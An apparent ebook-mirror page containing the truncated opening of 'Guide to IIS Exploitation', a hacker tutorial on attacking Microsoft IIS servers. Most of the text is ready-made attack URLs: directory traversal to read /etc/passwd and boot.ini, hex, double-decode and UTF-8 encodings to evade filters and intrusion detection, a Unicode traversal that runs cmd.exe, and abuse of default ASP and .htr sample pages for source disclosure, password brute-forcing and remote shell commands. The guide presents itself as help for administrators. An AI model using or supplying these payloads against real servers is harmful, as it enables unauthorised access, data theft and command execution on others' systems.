• Home
• Gwizdała,
• Hłasko,

Tematy

• Życie jest pełne cytatów - odparł Wallander. - Zawsze się znajdzie coś, co pasuje.
• Guide to the Arduino Mini, ARDUINO, Arduino Projects and Tutorials Ebook Collection, Arduino Tutorials
• Gwiezdne Wojny - kolejność, Star Wars, Star Wars - e-booki (free)
• H.P. Lovecraft - Cos na progu, e-booki, Lovecraft H P
• Gwiazdozbiór w Solidarności - Joanna Duda-Gwiazda, E-booki
• Gwiezdne Wojny - Zahn Timothy - Bohater Cartao 2 - Narodziny Bohatera (mandragora76), Star Wars E - booki
• Gwiazda - Danielle Steel, Biblioteka, Danielle Stell, E-booki
• H. P. Lovecraft - Kolor z przestworzy, e-booki, Lovecraft H P, Zew Cthulhu
• H.P. Lovecraft - Szepczący w ciemności, e-booki, Lovecraft H P, Zew Cthulhu
• Guide to Elliptic Curve Cryptography, Kryptologia, Computer Security Enthusiast Ebook Collection [haslo Stefan](Stefan 68)
• H. P. Lovecraft - Poetry of the Gods, E-Book, H.P. Lovecraft
• zanotowane.pl
• doc.pisz.pl
• pdf.pisz.pl
• doliczonyczas.keep.pl

[ Pobierz całość w formacie PDF ]
**************************************************************************** Guide to IIS Exploitation ** by fugjostle ** ** V.1.0.1 ** ** Questions? Comments? Email: fugjostle at ch0wn.com ****************************************************************************Disclaimer: I do not condone hacking IIS servers in any way,shape or form. This guide is intended as a guidefor admins to help them understand what mostscript kiddies don't understand but are happy toexploit.--[On the first day, God created directory traversal]Relative paths are the developers friend. They allow an entire website tobe moved to another directory without the need for changing all the linksin the html. For example, lets say we have a webpage called 'pictures.html'in the htdocs dir:Absolute path: /home/webpages/htdocs/pictures.htmlAbsolute path: /home/webpages/images/pic1.gifIn the html you can refer to the 'pic1.gif' via an absolute path shownabove or use a relative path:Relative path: ../images/pic1.gifThe relative path tells the server that it has to go to the parentdirectory (dot dot) --> from /home/webpages/htdocs to /home/webpages. Thenthe server goes into the images dir and looks for the gif file to display.Anyone who has used the 'cd' command in DOS and *nix should be familiarwith the operation. So what's the problem I hear you ask... well, theprogrammers of web server didn't think to check the supplied URL to ensurethat the requested file was actually in the web directory. This allowssomeone to backtrack through the servers directory structure and requestfiles that the web server has access to. For example,http://www.target.com/../../../etc/passwdNB. you can also use double dots and double quotes. This is useful to evadeIntrusion Detection Systems (IDS):http://www.target.com//....//....//...././etc/./passwdThe webserver simply strips the extra stuff out and processes the request.This is the same as the previous example and can make string matching IDS'swork for their money.--[On the second day, God created Hexadecimal]Once programmers started to realise the mistake they began to create parserroutines to check for naughty URL's and keep the requests within thedocument root. Then along comes a wiley hacker who wonders if by encodingthe URL will it still be recognised by the parser routines.You may have noticed that when you enter a URL that includes a space it isreplaced with the hex equivalent (%20):http://www.target.com/stuff/my index.htmlbecomeshttp://www.target.com/stuff/my%20index.htmland voila, it works. So what would happen if we changed the now denied URL:http://www.target.com/../../../etc/passwdtohttp://www.target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwdThe parser routine checks for the existence of dots in the path and findsnone... the webserver then proceeds with the request.An interesting feature is that you can encode the hex symbol and the webserver will decode it all for you. This is called the "double decode".For example, given the URL "http://victim.com/..%252f..%252fdocs/", thefollowing will take place:(1) On the first decode, the string will be converted to:"http://victim.com/..%2f..%2fdocs/"[%25 = '%' so '%252f' is decoded to '%2f'](2) On the second decode, the string will be converted to:"http://victim.com/../../docs/"[%2f = '/']--[On the third day, God created Unicode]The World Wide Web is a global phenomenon and as such needs to be globallyinteroperable. This raised the question of how to deal with all the differentcharacter sets around the world. As a response to this, Unicode was created:-----------------------------------------------------------------Unicode provides a unique number for every character, no matterwhat the platform, no matter what the program, no matter whatthe language. The Unicode Standard has been adopted by suchindustry leaders as Apple, HP, IBM, JustSystem, Microsoft,Oracle,SAP, Sun, Sybase, Unisys and many others. Unicode isrequired by modern standards such as XML, Java, ECMAScript(JavaScript), LDAP, CORBA 3.0, WML, etc., and is the officialway to implement ISO/IEC 10646. It is supported in many operatingsystems, all modern browsers, and many other products.-----from http://www.unicode.org---------------------------------The problem with Unicode is that it requires 16 bits for a single characterand software tended to use 8 bits for a single character. Unicode TransFormusing 8 bits (UTF-8) was created. This allows for multibyte encoding where avariable number of bytes can be used for each character:Character 1-byte 2-byte 3-byte. 2E C0 AE E0 80 AE/ 2F C0 AF E0 80 AF\ 5C C1 9C E0 81 9CThis lead to a new vulnerability in certain webservers. The parser didn'tunderstand this new encoding and allowed it through :-)For example:www.target.com/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwdRecent vulnerabilities have been taking advantage of the fact that the webserver doesn't understand the Unicode UTF-8 character set but the underlyingOS does:www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dirUnderstanding the distinction between Unicode and UTF-8 can be difficult. Asa general rule of thumb you can use the following format as a guide:%uxxxx = Unicode%xx%xx = UTF-8%xx = Hexidecimal%xxxx = Double Decode--[On the fourth day, God created default installs]IIS comes installed with various DLL's (Dynamic Link Libraries) thatincrease the functionality of the web server. These ISAPI (Internet ServerAPI) applications allow programmers/developers to deliver more functionalityto IIS.The DLL's are loaded into memory at startup and offer significant speedover traditional CGI programs. For example, they can be combined with theInternet Database Connector (httpodbc.dll) to create interactive sites thatuse ODBC to access databases.The problem is that some of these DLL's are insecure and are often installedwith sample scripts that demonstrate how to exploit, erm, I mean use them.ASP.DLL is used to pre-process requests that end in ".asp". ASP (ActiveServer Pages) are basically HTML pages with embedded code that is processedby the webserver before serving it to the client.Here's some examples to illustrate how the sample pages installed by defaultcan aid someone breaking into your site via the ASP.DLL:[prefix all the examples with http://www.target.com]/default.asp.** Appending a '.' to the URL can reveal the source** on older systems. Remember hex encoding? You can** also try using %2e to do the same thing./msadc/samples/adctest.asp** This gives you an interface into the msadcs.dll** and allows creation of DSN's. Read RFP's stuff** for idea's on how to exploit this./iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini** You can view the source of anything in the** document root. '/msadc/' needs to be in the** request as it is checked for, wait for this,** security :-)/index.asp::$DATA** Appending '::$DATA' to the URL can reveal** the source of the ASP./index.asp%81** Append a hex value between 0x81 and 0xfe** and you can reveal the source of any server** processed file. This only works on servers** that are Chinese, Japanese or Korean./AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|** This one allows you to execute remote** shell commands ;-)ISM.DLL is used to process requests that end in ".htr". These pages were usedto administer IIS3 servers. In IIS4 they are not used but various .htr samplesare installed by default anyway and offer another avenue for entry./index.asp%20%20%20..(220 more)..%20%20.htr** IIS will redirect this request to ISM.DLL,** which will strip the '.htr' extension and** deliver the source code of the file./global.asa+.htr** Does the same thing as the %20%20 exploit** above. ISM.DLL strips the +.htr and delivers** you the source of the file/scripts/iisadmin/ism.dll?http/dir** Excellent brute force opportunity if the** dll exists. Successful logons will reveal** lots of useful stuff./iisadmpwd/aexp.htr** The iisadmpwd diectory contains several .htr** files that allow NetBIOS resolution and** password attacks./scripts/iisadmin/bdir.htr??c:\inetpub\www** This method will only reveal directories** but can be useful for identifying the** servers structure for more advanced** attacks later.MSADCS.DLL is used to allow access to ODBC components via IIS using RDS(Remote Data Service). RDS is part of the default install of Microsoft DataAccess Components (MDAC) and is a commonly exploited on IIS. It can allowarbitrary shell commands to be executed with system privileges./msadc/msadcs.dll** If this file exists then there's a pretty** good chance that you can run the RDS** exploit again the box. More on this later.HTTPODBC.DLL is the Internet Connector Database (IDC) and used when the webserver wants to connect to a database. It allows the creation of web pagesfrom data in the database, and it allow... [ Pobierz całość w formacie PDF ]